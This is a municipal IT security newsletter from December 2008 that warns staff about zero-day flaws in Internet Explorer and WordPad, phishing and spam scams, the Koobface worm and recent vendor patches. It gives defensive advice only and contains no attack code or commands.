This Week's Trends
This week the levels of SPAM and trojans/malware that we have seen in the City has spiked again. The temporary reprieve we
had after one of the major botnet providers was shut down, seems to be over. This is a good indication that there are still many
insecure computers and systems out there that are easily compromised and put into the service of the criminal bot owners
We've been seeing new email scams pretending to be order status, postcards from friends, and returned email notices.
We've also seen some SPAM getting through the City's filters with notices of lottery winnings. As nice as it would be to win the
lottery right now, please don't be tempted by these scams.
There are two new "zero-day" exploits on Microsoft Internet Explorer and WordPad that we are quite concerned about. They are the
first items in the newsletter below. Read about them and be aware that these could be very dangerous.
NOTE: I'll be on vacation until after the New Year, so you're all on your own till next year - so be careful. Have a great
(and safe) Holiday!
Very Serious Zero-Day Exploit for Internet Explorer
A new exploit that exploits a vulnerability in all versions of Internet Explorer is spreading rapidly across the Internet. This is
called a "zero-day" because there are no patches currently available. A Windows PC can become infected simply by opening an affected
web page.
We are hearing about more and more web sites being compromised to deliver this exploit. Many of them are mainstream
sites so it is quite possible to be infected by visiting a site you trust and even have history with.
Anti-virus software only offers limited protection against web pages that contain this kind of exploit. For one thing, not all anti-virus solutions monitor internet traffic; many are limited to inspecting files.
Once a web page has been saved in the cache, however, it is usually already too late, and the malicious code has already been
injected and launched. In addition, not all anti-virus vendors have managed to create suitable signatures.
Microsoft has released an extensive list of
workarounds that explain how to configure Internet Explorer in a way that renders the exploit ineffective. However, these
can be impractical because they tend to make Internet Explorer quit working on many web sites.
We are advising users to:
- Make sure your antivirus is up to date
- If possible switch to a different browser (FireFox, Google Chrome, Opera, etc.) until Microsoft comes out with a patch
NOTE: City users must contact their service desk to see if this is possible - do not install browser software on your own computer
without authorization.
- Watch for a patch from Microsoft and apply it as soon as it is available (City systems will be updated automatically)
- Avoid using Internet Explorer, or if you must - follow the workarounds as noted above on Microsoft's site
NOTE: Again - City users must contact your service desk for assistance when changing settings on your browser.
Microsoft WordPad Zero-Day Vulnerability
There are reports of a new vulnerability in Microsoft's WordPad. This is another "zero-day" exploit because no patches are out
yet. This affects the WordPad Text Converter for Word 97 files on Windows 2000 Service Pack 4, Windows XP Service Pack 2,
Windows Server 2003 Service Pack 1, and Windows Server 2003 Service Pack 2.
Windows XP Service Pack 3, Windows Vista, and Windows Server 2008 are not affected as these operating systems do not contain the
vulnerable code.
Microsoft is working on this, but at this time there have only been limited and targeted attacks exploiting this vulnerability.
This attack is generally delivered via infected email attachments.
Be vigilant with your email. Do not open any attachment that you are not sure about. Even if it comes from someone you
know - it is a good idea to contact them before you open it and ask if they actually sent it to you.
Holiday Flyers Warned of E-mail Spam
Hackers are using hoax e-mails that appear to come from airlines as a way to spread malicious Trojans, according to Sophos.
The security firm said e-mails disguised as messages from well-known carriers such as Virgin Atlantic and Delta have been
received by Web users worldwide. The e-mail claims the recipient has registered an account with the airline and that their
credit card has been charged. Also attached to the e-mail is a Zip file called ‘purchase invoice and your airline ticket.’
Sophos is warning web users not to open this attachment as it contains a Trojan horse designed to steal information
or allow hackers to secretly access the victim’s computer.
FBI: Criminals Auto-dialing With Hacked VoIP Systems
Criminals are taking advantage of a bug in the Asterisk Internet telephony system that lets them pump out thousands of scam phone
calls in an hour, the U.S. Federal Bureau of Investigation (FBI) warned December 5.
The FBI did not say which versions of Asterisk were vulnerable to the bug, but it advised users to upgrade to the latest version
of the software. Asterisk is an open-source product that lets users turn a Linux computer into a VoIP telephone exchange.
In so-called vishing attacks, scammers usually use a VoIP system to set up a phony call center and then use phishing e-mails to
trick victims into calling the center. Once there, they are prompted to give private information. But in the scam described by the
FBI, they apparently are taking over legitimate Asterisk systems in order to directly dial victims. “Early versions of the Asterisk
software are known to have vulnerability,” the FBI said in an advisory posted Friday to the Internet Crime Complaint Center. “The
vulnerability can be exploited by cyber criminals to use the system as an auto dialer, generating thousands of vishing telephone
calls to consumers within one hour.”
U.S. Authorities Crack Down on Scareware Scam
The Federal Trade Commission has succeeded in getting a court to freeze the activities of two companies that have been behind a
massive scareware scam.
Innovative Marketing, Inc. and ByteHosting Internet Services, LLC were named in the legal case as being behind a scam where
computer users were told that their computers were infected with viruses when they visited a Web page. The virus warning includes
a link to a Web page where the viewer could buy antivirus software such as WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP
Antivirus for $39.95 or more.
Up to one million Americans may have fallen for the scam. The U.S. District Court for the District of Maryland heard that the two
companies duped advertising networks into believing that they were running legitimate advertising. However, code was inserted into
adverts that redirected viewers to Web pages that claimed to have detected the viruses. The court has now frozen the activities of
the two companies and is trying to get financial compensation for those people fooled by the scam. However, this may be difficult
as Innovative Marketing is a company incorporated in Belize that maintains offices in Kiev, Ukraine. ByteHosting Internet Services
is based in Cincinnati, Ohio, and the court is taking action against that company.
Koobface Worm targets MySpace, Other Sites
The Koobface worm which has plagued the Facebook social networking site during the past week, is now targeting MySpace, Bebo, and
other sites as well, security researchers warn.
Researchers at security vendor F-Secure said December 9 in a blog about the Koobface worm that the new infection is designed to
spread to other popular social networking sites, including MyYearbook.com, BlackPlanet.com, and Friendster.com. But with the
ever-increasing effort to find zombies to work in botnets, such large-scale attacks are making a comeback, experts say.
Social networks are an obvious target for such attacks because users are more likely to click on links or be duped by messages if
they come from individuals they believe to be “friends,” they say. Facebook says it is deleting content generated by the worm,
and officials say the social networking site has “again contained” the worm. The company also is posting updates to the Facebook
security page and is publishing best practices to help users avoid phishing attacks.
Four Cross Site Scripting (XSS) Flaws Hit Facebook
Project XSSed, the clearing house for cross site scripting flaws has just released details on four flaws affecting Facebook’s
developers page, iPhone login page and the new users registration page, potentially assisting malicious attackers into adding
more legitimacy to their campaigns. With yet another critical XSS flaw hitting Facebook in May earlier this year, what’s the
potential exploitability of such flaws if any in the wake of the ongoing Koobface worm’s rounds across the social networking
site?
It’s worth pointing out that in both of these cases there were no known cases of active exploitation, perhaps due to Facebook’s
quick reaction upon being notified of them. Facebook has been notified about these latest flaws.
Hackers Will Move to Use Rich Content Files (PDF and Flash) Next Year
PDF and Flash files will be used by cybercriminals much more in 2009. Finjan’s Malicious Code Research Center has predicted that
rich content files will be used to distribute malicious code. In its web security trends report, MCRC claimed that cybercriminals
are taking advantage of the specific functionality available in Flash ActionScript that enables the Flash file to interact with
its hosted web page (DOM). They embed their malicious code in Flash files and dynamically inject it into the hosting DOM to
exploit a browser-vulnerability and to install a Trojan.
Although Flash supports the functionality to prevent such interactions, many site owners are not using it. The report further
reveals that large advert networks that serve Flash-based banner ads do not prevent their ads from interacting with the hosting
webpage. The lack of configuration by advertising networks to prevent this interaction, between the served Flash-based ad’s
ActionScript and the DOM, has become a new vector for cybercriminals to serve their malicious code undetected.
Google Advertisements Punting Rogue Software
Researchers from Websense have caught Google carrying ads punting rogue software that secretly installs malware on the PCs of
its users.
Recent Google searches for Winrar turned up sponsored links that offer a "spyware free" copy of the widely used data-compression
application. Google users unfortunate enough to download and install that software are soon exposed to a program that makes
changes to their PC's hosts file. From then on, every time the users try to visit Google, Yahoo, and other popular sites, they are
instead sent to an impostor site under the control of the attackers.
The operation is another testament to the resourcefulness of those running rogue software scams. Rather than relying on zero-day
vulnerabilities or hard-to-execute website hijackings, they often find it easier to snare their victims through legitimate ads
placed on Google or elsewhere.
A Google spokesman said the company is in the process of removing the offending sites from its ad network. "Google is committed
to ensuring the safety and security of our users and our advertisers," he said.
Major Web Browsers Fail Password Protection Tests
That nifty password management feature in your favorite Web browser could be helping identity thieves pilfer your personal
data.
That’s the biggest takeaway from the results of this test which shows that all the major Web browsers — including IE, Firefox,
Opera, Safari and Chrome — are vulnerable to a total of 20 vulnerabilities that could expose password-related information. Among
the problems are three in particular that, when combined, allow password thieves to take passwords without the user’s knowledge.
They are:
- The destination where passwords are sent is not checked.
- The location where passwords are requested is not checked.
- Invisible form elements can trigger password management.
Google’s shiny new Chrome browser was among the worst offenders. According to the study, Chrome’s password manager contains
multiple unpatched issues that “form a toxic soup of potential vulnerabilities that can coalesce into broad insecurity.”
Apple’s Safari for Windows browser also failed a majority of the tests.
New Threats Thrive on a Changing Web
The Web and the growing popularity of Web 2.0 applications will continue to pose a huge threat to both consumers and enterprises,
according to security firm Sophos Plc.
“We’re finding over 15,000 new Web pages being infected every day and 90 percent of Web threats reside on legitimate hacked sites
while, about 1 percent of all Web searches deliver an infected Web page. So what you’ve got are these legitimate Web sites, how
then do people protect themselves against this?” said the director of sales for Asia at Sophos.
According to the official, the
security threat landscape is changing, making it all the more difficult for IT managers to secure the network and end users. “We
used to protect the endpoint at the gateway but what’s changed is now you’ve got Internet access, cloud computing, mobile workers
and remote access, USB key and third-party devices being plugged in, a lot more outsourcing so you have contract workers, etc. So,
all of a sudden, the whole security game has changed and IT managers now need to look at a lot of different factors in securing
their endpoints,” he said.
Social networking sites, for one, are proving to be a growing challenge for most IT managers or information security officers
because, while some companies use these for their business, some employees use these for purely social reasons, which becomes
both a productivity and a security issue.
Phishing Scam With U.S. Bank Logos
We have seen warnings of an e-mail phishing scam that claims to come from U.S. Bank. According to a news release, the scam e-mail
contains U.S. Bank logos and graphics and tells recipients that they are required to sign up for a program called “Verified by
Visa” and provide their personal account information through a Web link.
The message also tells recipients that if they do not comply with the instructions, their account will be immediately disabled.
The scam was tracked and discovered to have originated in Romania. Consumers who entered their account numbers into the fake Web
link had money transferred from their personal accounts, without their authorization, to a pre-paid debit card.
Consumers who have received the phishing e-mail should delete the message from their inboxes without entering any
information. People who have opened the message should run an anti-virus program on their computer immediately and change all of
their passwords.
Flurry of SPAM Targeting the FBI
Consumers continue to be inundated by spam purportedly from the FBI. As with previous spam attacks, the latest versions use the
names of several high ranking executives within the FBI and even the IC3 to attempt to defraud consumers.
Many of the spam e-mails currently in circulation claim to be an "official order" from the FBI's Anti-Terrorist and Monetary Crimes
Division, from an alleged FBI unit in Nigeria, confirm an inheritance or contain a lottery notification, all informing recipients
they have been named the beneficiary of millions of dollars. To claim the large sum, recipients are instructed to furnish their
personally identifiable information (PII) and are often threatened with some type of penalty, such as prosecution, if they fail to
do so. Specific PII information requested includes, but is not limited to, the recipient's name, banking information, telephone
number, and a copy of their passport.
The spam e-mail allegedly from the IC3 states that the recipient has extorted money and will be given a limited amount of time to
refund the money or face prosecution.
The FBI does not send unsolicited e-mails of this nature. FBI Executives are briefed on numerous investigations but do not
personally contact consumers regarding such matters. In addition, the IC3 does not send threatening letters to consumers demanding
payments for Internet crimes. Consumers should not respond to any unsolicited e-mails or click on any embedded links associated
with such e-mails, as they may contain viruses or malware.
Microsoft Patch Tuesday - Eight Patches, 28 Vulnerabilities
In its largest security update of the year, Microsoft on Tuesday delivered eight patches to correct a monster 28
vulnerabilities.
Six of the bulletins address "critical" bugs, while two others involve vulnerabilities rated "important."
"The sheer number of vulnerabilities being patched is what grabs my attention," said Ben Greenbaum, senior research manager at
Symantec Security Response. "They all have the potential to be dangerous if not patched."
Seven of the patches affect client-side applications, including Office, Internet Explorer, ActiveX and Graphics Device Interface
(GDI), said Andrew Storms, director of security operations at nCircle.
"Following the vulnerability trend of the past few years, in order to take advantage of these bugs, attackers need to entice the
user to take action, such as going to a malicious website or opening a file containing malware," Storms said.
He added that he expects attackers to attempt to exploit the flaws this holiday season through social engineering tricks, such as
fake e-cards and websites claiming to offer animation and Christmas songs.
Users of Microsoft Operating Systems should install this update as soon as possible.
Note: This update does NOT address the Internet Explorer exploit and the WordPad exploit which were reported at the beginning of
this newsletter.
Apple Update Fixes 21 Security Vulnerabilities From OS X
Apple has issued updates that patch 21 security holes in a wide range of software and services contained in the latest Mac
operating system.
The worst of the flaws allow miscreants to remotely install malware on a machine with little or no action required by the user.
Among them are vulnerabilities in Adobe Flash, which were disclosed and patched more than a month ago and are being actively
exploited in the wild. Apple also patched its own software for handling documents based on PDF, or portable document
format.
Other defects in BOM, (short for Bill of Materials), CoreGraphics, Libsystem, and other OS X components could also lead to the
execution of malicious code. One vulnerability in Safari could allow attackers to steal cookies used to authenticate a user on a
sensitive website while another allowed users to download potentially unsafe files without warning.
Users of Apple Operating Systems should install this update as soon as possible.
RIM Updates BlackBerry Desktop to Address ActiveX Flaw
We reported this flaw last time, and wanted to let you know that RIM has realeased an update to fix it.
Research In Motion has quietly released an update to its BlackBerry Desktop Manager, fixing an ActiveX vulnerability in the Roxio
Media Manager that could be exploited by an attacker to cause a buffer overflow.
RIM uses the media manager to synchronize BlackBerrys and PCs running Microsoft Windows. In its advisory to customers issued
Nov. 27, RIM said the flaw could be exploited if a user visits a malicious website that invokes the control.
The company urged its customers to upgrade to the latest patch for the BlackBerry Desktop Software version 4.5, 4.6 or
4.7.
Symantec Anti-Virus Products Security Update
A flawed driver in Symantec's anti-virus products can be exploited to crash a PC. According to Symantec, the affected
SPBBCDRV.SYS driver stumbles when flawed arguments are submitted to the NtCreateMutant and NtOpenEvent functions. While the flaw
can only be exploited by users who are logged into a system, even users with restricted access rights are able to exercise the
bug. In principle, the flaw could also be exploited to launch a Denial of Service attack via injected malware.
According to Symantec, the problem mainly affects old products like Norton 360 1.x, Norton AntiSpam 2004 and 2005, Norton
AntiVirus 2004 to 2008, Norton Internet Security 2004 to 2008, Norton Personal Firewall 2004, 2005, 2006, Norton System Works
2004, 2005, 2006, Symantec AntiVirus Corporate Edition 10.0.x and 10.1.x as well as Symantec Client Security 3.0.x. The vendor has
released updates and is distributing them to end users through it's LiveUpdate service. Enterprise customers will need to download
the updates manually, so they can distribute and install them as appropriate.
We recommend updating as soon as possible if you are running any of the affected versions of this software.
